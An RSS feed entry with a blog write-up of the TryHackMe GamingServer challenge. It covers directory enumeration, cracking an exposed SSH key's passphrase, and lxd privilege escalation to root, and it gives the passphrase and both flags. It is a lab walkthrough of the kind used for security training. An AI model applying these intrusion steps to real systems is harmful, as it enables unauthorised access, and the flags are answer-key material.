		<post-id xmlns="com-wordpress:feed-additions:1">335</post-id>	</item>
		<item>
		<title>TryHackMe: GamingServer</title>
		<link>https://eric.cc/tryhackme-gamingserver/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=tryhackme-gamingserver</link>
					<comments>https://eric.cc/tryhackme-gamingserver/#respond</comments>
		
		<dc:creator><![CDATA[eric]]></dc:creator>
		<pubDate>Wed, 01 Sep 2021 14:00:00 +0000</pubDate>
				<category><![CDATA[Write Ups]]></category>
		<category><![CDATA[TryHackMe]]></category>
		<guid isPermaLink="false">http://eric.cc/?p=92</guid>

					<description><![CDATA[<p><a href="https://eric.cc/tryhackme-gamingserver/">TryHackMe: GamingServer</a><br />
<a href="https://eric.cc">Eric Logan</a></p>
<p>TryHackMe: GamingServer is an easy boot2root challenge on TryHackMe. This challenge simulates a &#8220;gaming server built by amateurs with no experience in web development.&#8221; With an exposed RSA Private Key, we can gain a foothold onto the server and take advantage of lxd, a development system, to escalate privileges to root. Information Gathering As always, [&#8230;]</p>
<p>The post <a href="https://eric.cc/tryhackme-gamingserver/">TryHackMe: GamingServer</a> appeared first on <a href="https://eric.cc">Eric Logan</a> written by <a href="https://eric.cc/author/eric/">eric</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p><a href="https://eric.cc/tryhackme-gamingserver/">TryHackMe: GamingServer</a><br />
<a href="https://eric.cc">Eric Logan</a></p>

<p class="wp-block-paragraph">TryHackMe: <a href="https://tryhackme.com/room/gamingserver">GamingServer</a> is an easy boot2root challenge on TryHackMe. This challenge simulates a &#8220;gaming server built by amateurs with no experience in web development.&#8221; With an exposed RSA Private Key, we can gain a foothold onto the server and take advantage of lxd, a development system, to escalate privileges to root.</p>



<h2 class="wp-block-heading">Information Gathering</h2>



<p class="wp-block-paragraph">As always, to start the information gathering phase of this challenge, we will use Nmap to scan all ports at the GamingServer&#8217;s IP address. </p>



<figure class="wp-block-image size-large"><img data-recalc-dims="1" loading="lazy" decoding="async" width="758" height="326" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2021/05/nmap.png?resize=758%2C326" alt="GamingServer Nmap results" class="wp-image-447" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2021/05/nmap.png?w=758&amp;ssl=1 758w, https://i0.wp.com/eric.cc/wp-content/uploads/2021/05/nmap.png?resize=300%2C129&amp;ssl=1 300w" sizes="(max-width: 758px) 100vw, 758px" /><figcaption class="wp-element-caption">Nmap results</figcaption></figure>



<p class="wp-block-paragraph">On this Ubuntu Linux machine, 2 out of the 65535 ports are open. Port 22 is running SSH version OpenSSH 7.6p1 and port 80 is running Apache 2.4.29. By going to this IP address in our browser, we can see that the apache web server is hosting a website called Draagan. </p>



<figure class="wp-block-image size-large"><img data-recalc-dims="1" loading="lazy" decoding="async" width="1024" height="698" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2021/05/website-1-1024x698.png?resize=1024%2C698" alt="GamingServer Draagan website" class="wp-image-450" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2021/05/website-1.png?resize=1024%2C698&amp;ssl=1 1024w, https://i0.wp.com/eric.cc/wp-content/uploads/2021/05/website-1.png?resize=300%2C204&amp;ssl=1 300w, https://i0.wp.com/eric.cc/wp-content/uploads/2021/05/website-1.png?resize=768%2C523&amp;ssl=1 768w, https://i0.wp.com/eric.cc/wp-content/uploads/2021/05/website-1.png?w=1199&amp;ssl=1 1199w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">GamingServer website</figcaption></figure>



<p class="wp-block-paragraph">It looks like the gaming server&#8217;s website is still under construction.</p>



<figure class="wp-block-image size-large"><img data-recalc-dims="1" loading="lazy" decoding="async" width="695" height="19" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2021/05/view-source-username-john.png?resize=695%2C19" alt="Draagan source code." class="wp-image-451" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2021/05/view-source-username-john.png?w=695&amp;ssl=1 695w, https://i0.wp.com/eric.cc/wp-content/uploads/2021/05/view-source-username-john.png?resize=300%2C8&amp;ssl=1 300w" sizes="(max-width: 695px) 100vw, 695px" /><figcaption class="wp-element-caption">HTML source code</figcaption></figure>



<p class="wp-block-paragraph">Going to the browser&#8217;s source code, we can see that the developers left a comment for John. We can conclude that John is the user account we should be targeting during this assessment. </p>



<p class="wp-block-paragraph">The overall functionality of this website is limited and does not give us an ample foothold onto the server. Therefore, another directory will give us the information we need to gain access to this machine.</p>



<figure class="wp-block-image size-large"><img data-recalc-dims="1" loading="lazy" decoding="async" width="778" height="345" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2021/05/gobuster.png?resize=778%2C345" alt="GamingServer Gobuster results" class="wp-image-452" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2021/05/gobuster.png?w=778&amp;ssl=1 778w, https://i0.wp.com/eric.cc/wp-content/uploads/2021/05/gobuster.png?resize=300%2C133&amp;ssl=1 300w, https://i0.wp.com/eric.cc/wp-content/uploads/2021/05/gobuster.png?resize=768%2C341&amp;ssl=1 768w" sizes="(max-width: 778px) 100vw, 778px" /><figcaption class="wp-element-caption">Gobuster results</figcaption></figure>



<p class="wp-block-paragraph">Using a tool like Gobuster, we can enumerate the directories and files on the webserver. The results above show that the /uploads and /secret directories could hold valuable information. </p>



<figure class="wp-block-image size-large"><img data-recalc-dims="1" loading="lazy" decoding="async" width="490" height="275" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2021/05/uploads.png?resize=490%2C275" alt="GamingServer uploads directory" class="wp-image-453" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2021/05/uploads.png?w=490&amp;ssl=1 490w, https://i0.wp.com/eric.cc/wp-content/uploads/2021/05/uploads.png?resize=300%2C168&amp;ssl=1 300w" sizes="(max-width: 490px) 100vw, 490px" /><figcaption class="wp-element-caption">/uploads directory</figcaption></figure>



<p class="wp-block-paragraph">Unless you want to read <a href="http://phrack.org/issues/7/3.html">the hacker manifesto</a> by The Mentor or look at a picture of a shocked Beaker from the Muppets, there isn&#8217;t any particular value from the manifesto.txt or meme.jpg files. However, the file of interest is the dict.lst file a dictionary list that contains common passwords.</p>



<figure class="wp-block-image size-large"><img data-recalc-dims="1" loading="lazy" decoding="async" width="1024" height="345" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2021/06/secrets-1024x345.png?resize=1024%2C345" alt="GamingServer secret directory" class="wp-image-503" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2021/06/secrets.png?resize=1024%2C345&amp;ssl=1 1024w, https://i0.wp.com/eric.cc/wp-content/uploads/2021/06/secrets.png?resize=300%2C101&amp;ssl=1 300w, https://i0.wp.com/eric.cc/wp-content/uploads/2021/06/secrets.png?resize=768%2C259&amp;ssl=1 768w, https://i0.wp.com/eric.cc/wp-content/uploads/2021/06/secrets.png?w=1364&amp;ssl=1 1364w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">/secret directory</figcaption></figure>



<p class="wp-block-paragraph">The /secret directory only has one file named secretKey. The secretKey refers to an RSA Private Key which can be used to authenticate SSH access. </p>



<h2 class="wp-block-heading">Exploitation</h2>



<p class="wp-block-paragraph">To start, we will copy the RSA private key into a file called id_rsa and permit it 600. Then will use the tool ssh2john.py to convert the id_rsa file into a format that John the Ripper will be able to crack. Finally, using the dict.lst we copied from the /uploads directory, we can then crack the RSA Private Key passphrase. </p>



<figure class="wp-block-image size-large"><img data-recalc-dims="1" loading="lazy" decoding="async" width="667" height="443" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2021/06/john.png?resize=667%2C443" alt="GamingServer Cracked RSA passphrase" class="wp-image-481" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2021/06/john.png?w=667&amp;ssl=1 667w, https://i0.wp.com/eric.cc/wp-content/uploads/2021/06/john.png?resize=300%2C199&amp;ssl=1 300w" sizes="(max-width: 667px) 100vw, 667px" /><figcaption class="wp-element-caption">RSA passphrase cracked</figcaption></figure>



<p class="wp-block-paragraph">After a couple of minutes, the RSA Private Key passphrase has been cracked, and the passphrase is <code>letmein</code>.</p>



<figure class="wp-block-image size-large"><img data-recalc-dims="1" loading="lazy" decoding="async" width="653" height="484" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2021/05/user.txt.png?resize=653%2C484" alt="GamingServer user.txt" class="wp-image-459" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2021/05/user.txt.png?w=653&amp;ssl=1 653w, https://i0.wp.com/eric.cc/wp-content/uploads/2021/05/user.txt.png?resize=300%2C222&amp;ssl=1 300w" sizes="(max-width: 653px) 100vw, 653px" /><figcaption class="wp-element-caption">user.txt</figcaption></figure>



<p class="wp-block-paragraph">Using the private key file, id_rsa, we can then use the id_rsa file to ssh into the machine as John. That&#8217;s where we can find the user.txt flag <code>a5c2ff8b9c2e3d4fe9d4ff2f1a5a6e7e</code>.</p>



<h2 class="wp-block-heading">Post Exploitation</h2>



<p class="wp-block-paragraph">The last thing we need to do to complete this challenge is escalating our privileges to root and find the root.txt flag. </p>



<figure class="wp-block-image size-large"><img data-recalc-dims="1" loading="lazy" decoding="async" width="344" height="82" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2021/05/sudo-l.png?resize=344%2C82" alt="sudo -l (fail)" class="wp-image-460" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2021/05/sudo-l.png?w=344&amp;ssl=1 344w, https://i0.wp.com/eric.cc/wp-content/uploads/2021/05/sudo-l.png?resize=300%2C72&amp;ssl=1 300w" sizes="(max-width: 344px) 100vw, 344px" /><figcaption class="wp-element-caption">sudo -l</figcaption></figure>



<p class="wp-block-paragraph">Unlike other privilege escalation challenges, the sudo -l command does not bear much information because we do not have john&#8217;s password.  </p>



<figure class="wp-block-image size-large"><img data-recalc-dims="1" loading="lazy" decoding="async" width="734" height="171" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2021/05/transfer-linpeas.png?resize=734%2C171" alt="uploading linpeas.sh to the server" class="wp-image-463" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2021/05/transfer-linpeas.png?w=734&amp;ssl=1 734w, https://i0.wp.com/eric.cc/wp-content/uploads/2021/05/transfer-linpeas.png?resize=300%2C70&amp;ssl=1 300w" sizes="(max-width: 734px) 100vw, 734px" /><figcaption class="wp-element-caption">uploading linpeas.sh</figcaption></figure>



<p class="wp-block-paragraph">However, we can upload a tool called linpeas.sh onto the server to <a href="https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS">search for possible paths to escalate privileges on Linux/Unix*/MacOS hosts.</a>  LinPEAS, Linux Privilege Escalation Awesome Script, is a great tool to automate the privilege escalation process. </p>



<figure class="wp-block-image size-large"><img data-recalc-dims="1" loading="lazy" decoding="async" width="779" height="328" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2021/05/linpeas.png?resize=779%2C328" alt="GamingServer linpeas.sh results" class="wp-image-461" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2021/05/linpeas.png?w=779&amp;ssl=1 779w, https://i0.wp.com/eric.cc/wp-content/uploads/2021/05/linpeas.png?resize=300%2C126&amp;ssl=1 300w, https://i0.wp.com/eric.cc/wp-content/uploads/2021/05/linpeas.png?resize=768%2C323&amp;ssl=1 768w" sizes="(max-width: 779px) 100vw, 779px" /><figcaption class="wp-element-caption">linpeas.sh results</figcaption></figure>



<p class="wp-block-paragraph">As the legend states, anything with a highlighted RED/YELLOW text indicates it is 95% a Privilege escalation vector.  LXD, highlighted above, <a href="https://searchitoperations.techtarget.com/definition/LXD-Linux-container-hypervisor">is an open-source container management extension for Linux Containers (LXC)</a>. </p>



<p class="wp-block-paragraph">The LinPeas README file states that all of LinPeas&#8217; checks are explained in book.hacktricks.xyz. This <a href="https://book.hacktricks.xyz/linux-unix/privilege-escalation/interesting-groups-linux-pe/lxd-privilege-escalation">website</a> has instructions on how to escalate our privileges to root because we are a part of lxd/lxc group.  </p>



<figure class="wp-block-image size-large"><img data-recalc-dims="1" loading="lazy" decoding="async" width="476" height="705" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2021/05/lxd-priv.png?resize=476%2C705" alt="lxd privilege escalation" class="wp-image-462" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2021/05/lxd-priv.png?w=476&amp;ssl=1 476w, https://i0.wp.com/eric.cc/wp-content/uploads/2021/05/lxd-priv.png?resize=203%2C300&amp;ssl=1 203w" sizes="(max-width: 476px) 100vw, 476px" /><figcaption class="wp-element-caption">lxd privilege escalation</figcaption></figure>



<p class="wp-block-paragraph">Run the first block of commands on your host machine and then upload it to the victim server.  </p>



<figure class="wp-block-image size-large is-resized"><img data-recalc-dims="1" loading="lazy" decoding="async" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2021/05/uploaded.png?resize=747%2C346" alt="uploading lxd.tar.xz and rootfs.squashfs files" class="wp-image-465" style="width:747px;height:346px" width="747" height="346" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2021/05/uploaded.png?w=747&amp;ssl=1 747w, https://i0.wp.com/eric.cc/wp-content/uploads/2021/05/uploaded.png?resize=300%2C139&amp;ssl=1 300w" sizes="(max-width: 747px) 100vw, 747px" /><figcaption class="wp-element-caption">uploading lxd privilege escalation</figcaption></figure>



<p class="wp-block-paragraph">After uploading the lxd.tar.xz and rootfs.squashfs file, we add the image, create a container and add root path, and finally execute the container to become root.</p>



<figure class="wp-block-image size-large"><img data-recalc-dims="1" loading="lazy" decoding="async" width="775" height="175" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2021/05/root.png?resize=775%2C175" alt="Privilege escalation" class="wp-image-466" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2021/05/root.png?w=775&amp;ssl=1 775w, https://i0.wp.com/eric.cc/wp-content/uploads/2021/05/root.png?resize=300%2C68&amp;ssl=1 300w, https://i0.wp.com/eric.cc/wp-content/uploads/2021/05/root.png?resize=768%2C173&amp;ssl=1 768w" sizes="(max-width: 775px) 100vw, 775px" /><figcaption class="wp-element-caption">becoming root</figcaption></figure>



<p class="wp-block-paragraph">The last thing to do is to find the root.txt flag. </p>



<figure class="wp-block-image size-large"><img data-recalc-dims="1" loading="lazy" decoding="async" width="604" height="260" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2021/05/root.txt.png?resize=604%2C260" alt="GamingServer root.txt" class="wp-image-467" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2021/05/root.txt.png?w=604&amp;ssl=1 604w, https://i0.wp.com/eric.cc/wp-content/uploads/2021/05/root.txt.png?resize=300%2C129&amp;ssl=1 300w" sizes="(max-width: 604px) 100vw, 604px" /><figcaption class="wp-element-caption">root.txt</figcaption></figure>



<p class="wp-block-paragraph">It took some time but the root directory was accessible in the /mnt directory. Revealing that the root.txt flag is <code>2e337b8c9f3aff0c2b3e8d4e6a7c88fc</code>. </p>



<h2 class="wp-block-heading">Conclusion</h2>



<p class="wp-block-paragraph">In conclusion, this challenge was really fun and seemed more realistic than previous challenges. People upload their RSA private keys in directories they think people won&#8217;t find all the time. Like I said above, it took some time to find the root flag but it was better than just rushing over to the /root directory and finding it there.</p>



<figure class="wp-block-image size-large"><img data-recalc-dims="1" loading="lazy" decoding="async" width="1024" height="297" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2021/05/Task-1-1024x297.png?resize=1024%2C297" alt="GamingServer solutions" class="wp-image-446" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2021/05/Task-1.png?resize=1024%2C297&amp;ssl=1 1024w, https://i0.wp.com/eric.cc/wp-content/uploads/2021/05/Task-1.png?resize=300%2C87&amp;ssl=1 300w, https://i0.wp.com/eric.cc/wp-content/uploads/2021/05/Task-1.png?resize=768%2C223&amp;ssl=1 768w, https://i0.wp.com/eric.cc/wp-content/uploads/2021/05/Task-1.png?w=1211&amp;ssl=1 1211w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">Task 1 Solution</figcaption></figure>
<p>The post <a href="https://eric.cc/tryhackme-gamingserver/">TryHackMe: GamingServer</a> appeared first on <a href="https://eric.cc">Eric Logan</a> written by <a href="https://eric.cc/author/eric/">eric</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://eric.cc/tryhackme-gamingserver/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">92</post-id>	</item>
	</channel>
</rss>
